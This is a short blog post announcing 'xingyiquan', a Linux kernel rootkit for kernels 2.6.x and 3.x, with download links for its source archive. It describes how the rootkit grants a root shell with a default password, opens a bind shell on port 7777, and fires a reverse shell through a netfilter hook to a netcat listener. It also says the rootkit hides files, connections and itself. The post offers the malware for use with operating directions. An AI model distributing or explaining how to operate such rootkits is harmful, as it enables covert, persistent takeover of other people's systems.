xingyiquan – simple linux kernel rootkit for kernel 3.x and kernel 2.6.x

This is simple linux kernel rootkit works for kernel 3.x and 2.6.x.

FUNCTIONS

– escalate privilege
This rootkit has a binary utility named xingyi_rootshell, once this rootkit installed, you can get rootshell by type : ./xingyi_rootshell “sw0rdm4n”. String “sw0rdm4n” is default password for root shell, This string is written in
userspace config file at xingyi_userspace_src/xingyi_userspace_config.h

– bindshell
This rootkit has a default bind shell on port 7777 using default password : “sw0rdm4n”. String “sw0rdm4n” is default password for bind shell, This string is written in
userspace config file at xingyi_userspace_src/xingyi_userspace_config.h

– reverse shell
This rootkit has reverse shell functionality which will be triggered by netfilter hook, in order to get reverse shell to your ip via port 7777, you must fire telnet on port 1337 to the box where you install this rootkit. Before that
make sure you prepare a netcat listener on port 7777.

– another common functions
Another common functions : hide files/dirs, hide connections, hide module, hook kill process, hook open, hook open directory, etc.

Download

http://www.ringlayer.net/repo/xingyiquan.tar.gz

http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/xingyiquan.tar.gz

 

2 thoughts on “xingyiquan – simple linux kernel rootkit for kernel 3.x and kernel 2.6.x

  1. Pingback: “o noes its melting” | CCDCBlueTeam.com

  2. Pingback: Hack Anatomy – Spiritum Veritatis Blog

.

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s